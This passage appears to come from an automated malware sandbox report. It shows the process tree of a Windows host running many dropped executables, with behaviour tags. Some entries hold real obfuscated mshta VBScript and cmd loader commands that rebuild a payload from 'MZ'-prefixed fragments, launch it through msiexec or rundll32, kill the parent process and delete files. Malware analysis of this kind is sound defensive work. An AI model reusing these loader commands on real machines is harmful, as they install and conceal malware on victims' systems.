C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"8⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"8⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xhLgwAN_sWKad0Gt0LiD3lLz.exe"C:\Users\Admin\Pictures\Adobe Films\xhLgwAN_sWKad0Gt0LiD3lLz.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 18688⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"C:\Users\Admin\Pictures\Adobe Films\JoVBqle5ZuYZOmKRj95tPfGf.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\YROaLuGWqMiLNO5MI0NxWjDx.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "YROaLuGWqMiLNO5MI0NxWjDx.exe" -F10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"C:\Users\Admin\Pictures\Adobe Films\_WjLopI0SGjVoK1vv4RABWvT.exe"8⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\M6jzD4DsN636MdsrSCLyMxNK.exe"C:\Users\Admin\Pictures\Adobe Films\M6jzD4DsN636MdsrSCLyMxNK.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 2808⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\SS9XSoZmzR6yTxeWosrHLE5V.exe"C:\Users\Admin\Pictures\Adobe Films\SS9XSoZmzR6yTxeWosrHLE5V.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6a57f9e70,0x7ff6a57f9e80,0x7ff6a57f9e9011⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,2548857345635655658,17593232224503436592,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7636_1137790179" --mojo-platform-channel-handle=1792 /prefetch:810⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1728,2548857345635655658,17593232224503436592,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7636_1137790179" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:210⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LtPGrXM6HcaPC22YEKYV8Nfi.exe"C:\Users\Admin\Pictures\Adobe Films\LtPGrXM6HcaPC22YEKYV8Nfi.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 2768⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D_BLDnDHu_TD3iz9CSGyBFPI.exe"C:\Users\Admin\Pictures\Adobe Films\D_BLDnDHu_TD3iz9CSGyBFPI.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\D889cNcc5Y_B8MT1CZoqotRj.exe"C:\Users\Admin\Pictures\Adobe Films\D889cNcc5Y_B8MT1CZoqotRj.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 3368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xf7rCbRH4pGRa62Ofza35vUU.exe"C:\Users\Admin\Pictures\Adobe Films\xf7rCbRH4pGRa62Ofza35vUU.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Underdress.exeC:\Users\Admin\AppData\Roaming\Underdress.exe8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"9⤵
-
-
-
C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exeC:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eE5C0JFpVRfv_DCeuMEdyY5r.exe"C:\Users\Admin\Pictures\Adobe Films\eE5C0JFpVRfv_DCeuMEdyY5r.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\54p61i9IToLUgwDR5Xc2JSXD.exe"C:\Users\Admin\Pictures\Adobe Films\54p61i9IToLUgwDR5Xc2JSXD.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
-
C:\Users\Admin\AppData\Local\3839976.exe"C:\Users\Admin\AppData\Local\3839976.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\8588289.exe"C:\Users\Admin\AppData\Local\8588289.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\8736505.exe"C:\Users\Admin\AppData\Local\8736505.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\8736505.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\8736505.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\8736505.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\8736505.exe" ) do taskkill -f -Im "%~NXZ"11⤵
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"14⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ). RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i & CopY /b /Y CPkpI.I + sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q *14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"15⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "15⤵
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K16⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K17⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K18⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "8736505.exe"12⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\2208308.exe"C:\Users\Admin\AppData\Local\2208308.exe"9⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Local\4140920.exe"C:\Users\Admin\AppData\Local\4140920.exe"9⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2969⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BERNV.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BERNV.tmp\setup.tmp" /SL5="$2039C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TAIG8.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TAIG8.tmp\setup.tmp" /SL5="$40416,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT11⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart12⤵
-
C:\c80b4ce618f2b22e9b\Setup.exeC:\c80b4ce618f2b22e9b\\Setup.exe /q /norestart /x86 /x64 /web13⤵
- Loads dropped DLL
- Checks processor information in registry
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss112⤵
-
-
C:\Users\Admin\AppData\Local\Temp\is-EKSL5.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EKSL5.tmp\postback.exe" ss112⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 17529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 2969⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"10⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7496 -s 19529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 19689⤵
- Program crash
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 19689⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"7⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\J93t50WbZcEhobrEuzxKPi4w.exe"C:\Users\Admin\Documents\J93t50WbZcEhobrEuzxKPi4w.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\CPxLcn3HuVhrSf5EK9J2XoM6.exe"C:\Users\Admin\Pictures\Adobe Films\CPxLcn3HuVhrSf5EK9J2XoM6.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\eKOUrhDqulq3zBw4nSBt_xFz.exe"C:\Users\Admin\Pictures\Adobe Films\eKOUrhDqulq3zBw4nSBt_xFz.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\w_NTBuKInq4mhHVl5osl1CHj.exe"C:\Users\Admin\Pictures\Adobe Films\w_NTBuKInq4mhHVl5osl1CHj.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8924 -s 27610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H5g745DD4zaGI4veDHXuzIg9.exe"C:\Users\Admin\Pictures\Adobe Films\H5g745DD4zaGI4veDHXuzIg9.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee012⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2256 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2244 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:212⤵
-
-
